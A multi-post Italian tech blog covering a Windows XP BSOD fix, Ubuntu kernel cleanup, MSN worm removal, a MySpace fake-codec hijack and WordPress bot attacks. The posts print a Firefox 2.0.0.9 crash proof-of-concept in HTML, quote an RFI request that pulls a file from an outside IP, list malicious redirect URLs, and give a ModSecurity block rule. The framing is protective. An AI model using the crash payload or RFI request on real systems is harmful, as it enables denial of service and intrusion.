Sistema Operativo:Microsoft Windows Xp Professional 5.1.2600 SERVICE PACK 2 Build 2600 Scheda Video: Nvidia GForce 7600GT
RAM: 4 banchi corsair 2x512Mb + 2x1Gb (perfettamente funzionanti)

HD: Western Digital WDCWC3000JS SATA

MB: ASUS M2N-SLI DELUXE


(img: www.attivissimo.net ) Se vi doveste trovare davanti ad un blue screen of death di Windows XP con errore:
Stop 0x00000077 KERNEL_STACK_INPAGE_ERROR seguito da uno dei seguenti dettagli relativi

0x00000077 (0xc0000185,0xc0000185,0x00000000,0x002f3000)
0x00000077 (0xc0000185,0xc0000185,0x00000000,0x03d81000)
0x00000077 (0xc0000185,0xc0000185,0x00000000,0x052da000)
(Nota Bene: L'ultimo di questi valori anche differire ad ogni "crash" del s.o.)
sappiate che probabilmente il problema potrebbe nascere da un conflitto di alcuni dei driver che avete installati nel sistema operativo.

Se possedete una scheda nVidia i problemi potrebbero derivare proprio da lì e più precisamente dai driver IDE installati, i quali potrebbero andare a "scontrarsi" con i driver IDE di windows provocando il crash del sistema operativo di Microsoft. Se una volta aggiornati i driver nVidia, i problemi dovessero persistere, si dovranno disabilitare esclusivamente i driver nVidia IDE dal pannello di controllo.
Start
>Pannello di controllo
> Installazione Applicazioni
> Nvidia Drivers
> Rimuovere solo gli IDE Driver.
Riavviando il pc il problema dovrebbe scomparire.

Per maggiori informazioni sui vari bsod di Windows leggete quì
Nel caso di Windows Vista occorre eseguire un semplice aggiornamento dei driver o, come soluzione alternativa eseguire come per XP la loro rimozione manuale.
Clicca quì per effettuare il download dei driver nVidia più recenti

E' stato individuato un bug che renderebbe vulnerabile Firefox 2.0.0.9 ad attacchi del tipo Denial Of Service. L'attacco consisterebbe nelle seguenti righe di codice e permetterebbe ad un attaccante di far crashare il noto browser:

<script></script>

<iframe id="a" src="javascript:document.location='\x00res://'" width="100%" height="200"></iframe>

<iframe id="b" src="javascript:document.location='\x00about:config'" width="100%" height="200"></iframe>

<a href="#" onclick="javascript:document.location='\x00file:///'">test 1</a>

IL PoC lo trovate  cliccando quì. (Attenzione se usate firefox 2.0.0.9 con javascript abilitato il browser crasherà, disabilitandolo dovreste riuscire a farla franca, mentre Iexplorer non vi farà accedere alla pagina incriminata) Il bug dovrebbe risiedere nel mancato controllo della dimensione dei caratteri nei messaggi di errore. Se infatti il testo del messaggio è troppo  piccolo, del tipo minore di 512 bytes, IExplorer ritornerà un proprio messaggio di errore evitando quindi il bug, mentre Firefox comincerà a risucchiare memoria fino al crash. Via

Per tutte quelle distribuzioni con innumerevoli upgrade come Ubuntu Gutsy etc, è noioso accendere il pc ogni giorno e vedere che la lista grub continua a crescere e crescere. Pulire il s.o. dalle immagini di questi kernel non usati non significa solo avere un grub menu più chiaro e pulito, ma anche liberare spazio su disco poiché queste immagini ne occupano non poco. Quanto segue vale per Ubuntu ma dovrebbe funzionare anche su altre distro naturalmente tenendo bene a mente i nomi delle varie immagini del kernel e relativi package managers. Rimuovendo il kernel che state usando attualmente, naturalmente rovinerete la vostra distro linux, se rimuoverete tutte le immagini del kernel, sicuramente provocherete danni al sistema operativo rendendolo non più funzionale, quindi prestate molta attenzione.

1. Determinare il kernel in uso digitando da shell

uname -r

e scriversi il risultato del comando, nel mio caso :

$ uname -r

2.6.22-14-386

2. Cerca tutte le immagini del kernel installate

Andare su /boot/ e listarne il contenuto.

cd /boot ls vmlinuz* Prendere nota di tutte le versioni installate. Sempre nel mio caso:

$ ls vmlinuz*vmlinuz-2.6.15-26-386  vmlinuz-2.6.17-11-386  vmlinuz-2.6.22-14-386  vmlinuz-2.6.15-28-386  vmlinuz-2.6.20-16-386

3. Rimuovere i Kernel scelti

Come scritto in precedenza, fare attenzione a questo passo.Eseguire:

sudo apt-get remove linux-image-[version]-386 linux-image-[version]-386 .......

Consiglio di lasciare almeno una delle versioni precedenti oltre a quella attualmente in uso. questo il mio Output

$al0ha@al0ha-laptop:/boot$ sudo apt-get remove linux-image-2.6.15-26-386 linux-image-2.6.15-28-386 linux-image-2.6.17-11-386Lettura della lista dei pacchetti in corso... Fatto

Generazione dell'albero delle dipendenze in corso

Reading state information... Fatto

I seguenti pacchetti saranno RIMOSSI:

linux-image-2.6.15-26-386 linux-image-2.6.15-28-386

linux-image-2.6.17-11-386 linux-restricted-modules-2.6.15-26-386

linux-restricted-modules-2.6.15-28-386

linux-restricted-modules-2.6.17-11-386

0 aggiornati, 0 installati, 6 da rimuovere e 3 non aggiornati.

E' necessario prendere 0B di archivi.

Dopo l'estrazione, verranno liberati 256MB di spazio su disco.

Continuare [S/n]? S

(Lettura del database ... 136612 file e directory attualmente installati.)

Rimuovo linux-restricted-modules-2.6.15-26-386 ...

Rimuovo linux-image-2.6.15-26-386 ...

Your /etc/kernel-img.conf needs to be updated. Read grub's NEWS.Debian[1]

file and follow its instructions. 1. /usr/share/doc/grub/NEWS.Debian.gz

Searching for GRUB installation directory ... found: /boot/grub

Searching for default file ... found: /boot/grub/default

Testing for an existing GRUB menu.lst file ... found: /boot/grub/menu.lst

Searching for splash image ... none found, skipping ...

Found kernel: /boot/vmlinuz-2.6.22-14-386

Found kernel: /boot/vmlinuz-2.6.20-16-386

Found kernel: /boot/vmlinuz-2.6.17-11-386

Found kernel: /boot/vmlinuz-2.6.15-28-386

Found kernel: /boot/memtest86+.bin

Updating /boot/grub/menu.lst ... done

update-initramfs: Deleting /boot/initrd.img-2.6.15-26-386

Rimuovo linux-restricted-modules-2.6.15-28-386 ...

Rimuovo linux-image-2.6.15-28-386 ...

Your /etc/kernel-img.conf needs to be updated. Read grub's NEWS.Debian[1]

file and follow its instructions.

1. /usr/share/doc/grub/NEWS.Debian.gz

Searching for GRUB installation directory ... found: /boot/grub

Searching for default file ... found: /boot/grub/default

Testing for an existing GRUB menu.lst file ... found: /boot/grub/menu.lst

Searching for splash image ... none found, skipping ...

Found kernel: /boot/vmlinuz-2.6.22-14-386

Found kernel: /boot/vmlinuz-2.6.20-16-386

Found kernel: /boot/vmlinuz-2.6.17-11-386

Found kernel: /boot/memtest86+.bin

Updating /boot/grub/menu.lst ... done

update-initramfs: Deleting /boot/initrd.img-2.6.15-28-386

Rimuovo linux-restricted-modules-2.6.17-11-386 ...

Rimuovo linux-image-2.6.17-11-386 ...

Running postrm hook /sbin/update-grub .

Your /etc/kernel-img.conf needs to be updated. Read grub's NEWS.Debian[1]

file and follow its instructions.

1. /usr/share/doc/grub/NEWS.Debian.gz

Searching for GRUB installation directory ... found: /boot/grub

Searching for default file ... found: /boot/grub/default

Testing for an existing GRUB menu.lst file ... found: /boot/grub/menu.lst

Searching for splash image ... none found, skipping ...

Found kernel: /boot/vmlinuz-2.6.22-14-386

Found kernel: /boot/vmlinuz-2.6.20-16-386

Found kernel: /boot/memtest86+.bin

Updating /boot/grub/menu.lst ... done

Nel caso il vostro menu.lst non sia stato automaticamente ripulito, utilizzate il seguente comando:

sudo update-grub

Sicuramente ci sarà un modo migliore per farlo, infatti si potrebbe fare un parse di tutto il contenuto della dir /boot/ e rimuovere i risultati con un comando uname -r e quindi eseguire il tutto automaticamente, ma per il momento questa resta una ottima soluzione per pulire il vostro grub menu e alleggerire il vostro hard disk.

Negli ultimi giorni molti profili su myspace sono stati attaccati. Niente di nuovo -penserete- comunque questo nuovo approccio risulta differente. Il perché risiede nel fatto che gli "attackers" sembrano colpire solo le pagine di varie rock bands, sovrapponendole con una immagine di background che copre una parte della pagina che prova a redirezionarvi su una fasulla installazione di alcuni Media Codec, oppure come scritto nei vari Myspace Bulletins attraverso attacchi di phishing rubano le varie credenziali di accesso. Date uno sguardo a questa immagine:

 

Clicca quì per ingrandire

Ingrandendo l'immagine vi accorgerete che alla fine dello schermo c'é un .cn URL - da quì parte l'attacco. Esaminando il codice viene fuori

 

Scomponendo in sequenze di passi l'hijacking si noterà:

 

http://co8vd.cn/s/ (16:57:08)

 

http://co8vd.cn/su/in.cgi? (16:57:09)

 

http://filcu.cn/s/g.html (16:57:10)

 

Arrivati su quest'ultimo passo vi verrà richiesto di installare dei Media Codec.

Se proseguirete nell'installazione (evitate NdA) vi verrà installato nel browser una FAKE security toolbar capace di rubare password e credenziali di accesso.

 

L'allarme potrebbe derivare dal fatto che sembra che alcuni computer siano stati contagiati semplicemente visitando le pagine infette, cosa che dopo aver testato personalmente posso ritenere infondata.

 

Cascare nel tranello è molto facile soprattutto per quegli utenti che non hanno tanta dimestichezza nel riconoscere questo genere di attacchi, ma la particolarità di questo è che va a colpire le band musicali che naturalmente richiamano sempre un bel pò di utenti e quindi potenziali vittime.

 

Un attacco architettato molto bene.

Ecco una delle varie band colpite:

http://www.myspace.com/passarounders

 

 

 

 

Via

 

 

 

 

Donncha ha rilasciato un post dal titolo "tenere lontani i libwww-perl bot " usando il mod_rewrite e bloccando lo HTTP_USER_AGENT per prevenire attacchi. Questo comunque non sembra funzionare. Il perché è presto detto, E' semplice cambiare la stringa dello HTTP_USER_AGENT e l'attacco che si potrebbe verificare potrebbe non usare una stringa relativa allo user-agent standard quale libwww-perl user-agent . Inoltre, le possibilità che delegittimiate la lettura del vostro feed e di altri strumenti web che hanno accesso al vostro blog sono davvero tante. Donncha’s mostra un esempio di questo attacco:

GET //wp-pass.php?_wp_http_referer=http://148.245.107.2/.ssh/id.txt?? …
“libwww-perl/5.805″

Questa richiesta sembrerebbe provare ad eseguire l'exploit tramite un RFI (Remote File Inclusion vulnerability) . Ma a quanto confermano BlogWatch e altri non sembrerebberi esserci vulnerabilità del genere sulla piattaforma Wordpress al momento. Potrei pensare ad un bug nei vari themes/templates oppure nei plugin installati e disponibili online ma sul solo wp e sul file incriminato wp-pass.php non sembrano esserci bugs di questo tipo. Alcune regole per tenere lontani questi bot potete trovarle all'interno di questa pagina Comunque un altro modo per poter prevenire gli attacchi potrebbe avvenire attraverso l'uso di un firewall per Apache open source chiamato ModSecurity. La regola, poi, dovrebbe essere la seguente:

SecFilterSelective REQUEST_URI "wp-pass.php?_wp_http_referer"

Naturalmente se dipendete da librerie libwww-perl non usate queste regole altrimenti potreste ritrovarvi con il blog non più funzionante.

Questo worm si sta diffondendo su MSN molto rapidamente. Si viene contattati da frasi allusive del tipo: you care if i put this pictuer of you in my new album? haha lets hope your parents dont see this picture of you can i up some of these pics of ya to my myspace profile? This picture isn't you, right? Se avete decompresso ed eseguito il file che seguiva alle scritte img_1123.rar allora sappiate che siete stati infettati. La prima cosa da fare è avvisare tutti i contatti di msn dicendo loro di NON ACCETTARE quel file da voi inviato perché contiene il worm in questione. Il secondo passo è il seguente, scaricate questo file compresso, contentente un tool di rimozione virus della sophos con incluso all'interno la .ide che vi serve(una libreria necessaria alla rimozione del suddetto worm). Ho creato un file al0ha.bat che vi permetterà di eseguire facilmente il tool di rimozione automaticamente ovvero senza aprire shell di comando. Chi vuole eseguire la procedura automaticamente seguisse questi passi. Scarica al0ha.bat Scarica IDE Sophos Scarica Tool Sophos Scaricate tutti questi files, decomprimeteli tutti nella stessa cartella che chiamerete antiworm, copiateci all'interno anche al0ha.bat.Ora cliccate con il destro su risorse del computer e Disattivate il ripristino automatico del sistema. Applicate le impostazioni e riavviate la macchina in modalità provvisoria (premendo F8 qualche secondo prima dell'avvio di windows) Scegliete Modalità provvisoria. Una volta entrati in modalità provvisoria da amministratori,

1)aprite la cartella antiworm 2)cliccate due volte (eseguendo) il file chiamato al0ha.bat. 3) Seguite il tool di rimozione fino ad operazione ultimata e riavviate SEMPRE in modalità provvisoria. 4) Ripetete il procedimento e se non è stato trovato nulla questa volta riavviate in modalità Normale. A questo punto dovreste essere completamente puliti e potrete Riattivare il Servizio di ripristino disabilitato in precedenza. Il worm si diffonde solo tramite msn ma anche skype sembra non esserne immune... Questa soluzione è valida naturalmente solo per sistemi Windows. Le persone che mi hanno contattato e spinto a scrivere questo articolo, erano possessori di questo sistema operativo. :( Per tutti gli altri sistemi operativi la procedura da seguire la trovate quì. English Version X Luis :) Man, follow those steps: 1) Download all those files Download al0ha.bat Download IDE Sophos Download Tool Sophos Once you've done this 2) Extract Tool Sophos in one folder (double click on it). 3) Copy also IDE file and al0ha.bat in THAT directory. You'll have this result folder:

 

 

 

4) Now, go to the control panel

-> Open System.

 

5) Disable the system restore function.

 

6) Apply changes.

 

7) Reboot Your System and go to SAFE BOOT. (Press F8 Key before loading WindowsXP)

 

8) Enter in your system in safe mode.

 

9) Once you've done this open the folder that you created before that contains all files you needs.

 

 

10) Execute al0ha.bat (double click on it)

 

11) Wait until the process will complete scanning and removing.

 

***If al0ha.bat doesn't function, go to the command line (Start->Execute->cmd.exe) ***Move to your ANTIWORM DIRECTORY (Example-> cd c:\antiworm) ***NOW Digit: SAV32CLI.exe -REMOVE -P=c:\log.txt ***wait until the end of the process. 12) Now, reboot your system in normal way. 13) Repeat this scan in your system again. 14) If you don't find any other file infected with this worm , enable system restore again. Hope that this could help you in solve your problem with this worm.